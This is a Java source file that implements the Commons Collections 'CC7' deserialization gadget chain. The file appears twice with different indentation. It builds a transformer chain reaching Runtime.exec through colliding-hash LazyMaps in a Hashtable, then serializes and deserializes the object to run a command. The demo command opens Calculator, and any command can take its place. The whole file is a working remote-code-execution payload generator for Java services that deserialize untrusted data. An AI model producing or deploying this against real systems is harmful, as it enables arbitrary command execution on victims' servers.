yemoli/CC7.java

## CC7.java
package com.test;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class CC7 {

    public static void unserialize(String base) throws IOException, ClassNotFoundException {
        byte[] result = Base64.getDecoder().decode(base);
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(result);
        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();
    }

    public static String serialize(Object object) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(object);
        return Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray());
    }

    public static void setFieldValue(Object object, String field, Object arg) throws NoSuchFieldException, IllegalAccessException {
        Field f = object.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(object, arg);
    }


    public static Hashtable getObject(final String command) throws Exception {

        final String[] execArgs = new String[]{command};

        final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});

        final Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        execArgs),
                new ConstantTransformer(1)};

        Map innerMap1 = new HashMap();
        Map innerMap2 = new HashMap();

        Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
        lazyMap1.put("yy", 1);

        Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
        lazyMap2.put("zZ", 1);
        System.out.println(lazyMap1.hashCode());
        System.out.println(lazyMap2.hashCode());

        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 2);

        setFieldValue(transformerChain, "iTransformers", transformers);

        lazyMap2.remove("yy");

        return hashtable;
    }

    public static void main(String[] args) throws Exception {

        Hashtable object = getObject("open -a Calculator");
        String serialize = serialize(object);
        unserialize(serialize);


    }

}
	package com.test;

	import org.apache.commons.collections.Transformer;
	import org.apache.commons.collections.functors.ChainedTransformer;
	import org.apache.commons.collections.functors.ConstantTransformer;
	import org.apache.commons.collections.functors.InvokerTransformer;
	import org.apache.commons.collections.map.LazyMap;
	import java.io.*;
	import java.lang.reflect.Field;
	import java.util.Base64;
	import java.util.HashMap;
	import java.util.Hashtable;
	import java.util.Map;

	public class CC7 {

	public static void unserialize(String base) throws IOException, ClassNotFoundException {
	byte[] result = Base64.getDecoder().decode(base);
	ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(result);
	ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
	objectInputStream.readObject();
	}

	public static String serialize(Object object) throws IOException {
	ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
	ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
	objectOutputStream.writeObject(object);
	return Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray());
	}

	public static void setFieldValue(Object object, String field, Object arg) throws NoSuchFieldException, IllegalAccessException {
	Field f = object.getClass().getDeclaredField(field);
	f.setAccessible(true);
	f.set(object, arg);
	}


	public static Hashtable getObject(final String command) throws Exception {

	final String[] execArgs = new String[]{command};

	final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});

	final Transformer[] transformers = new Transformer[]{
	new ConstantTransformer(Runtime.class),
	new InvokerTransformer("getMethod",
	new Class[]{String.class, Class[].class},
	new Object[]{"getRuntime", new Class[0]}),
	new InvokerTransformer("invoke",
	new Class[]{Object.class, Object[].class},
	new Object[]{null, new Object[0]}),
	new InvokerTransformer("exec",
	new Class[]{String.class},
	execArgs),
	new ConstantTransformer(1)};

	Map innerMap1 = new HashMap();
	Map innerMap2 = new HashMap();

	Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
	lazyMap1.put("yy", 1);

	Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
	lazyMap2.put("zZ", 1);
	System.out.println(lazyMap1.hashCode());
	System.out.println(lazyMap2.hashCode());

	Hashtable hashtable = new Hashtable();
	hashtable.put(lazyMap1, 1);
	hashtable.put(lazyMap2, 2);

	setFieldValue(transformerChain, "iTransformers", transformers);

	lazyMap2.remove("yy");

	return hashtable;
	}

	public static void main(String[] args) throws Exception {

	Hashtable object = getObject("open -a Calculator");
	String serialize = serialize(object);
	unserialize(serialize);


	}

	}
No results found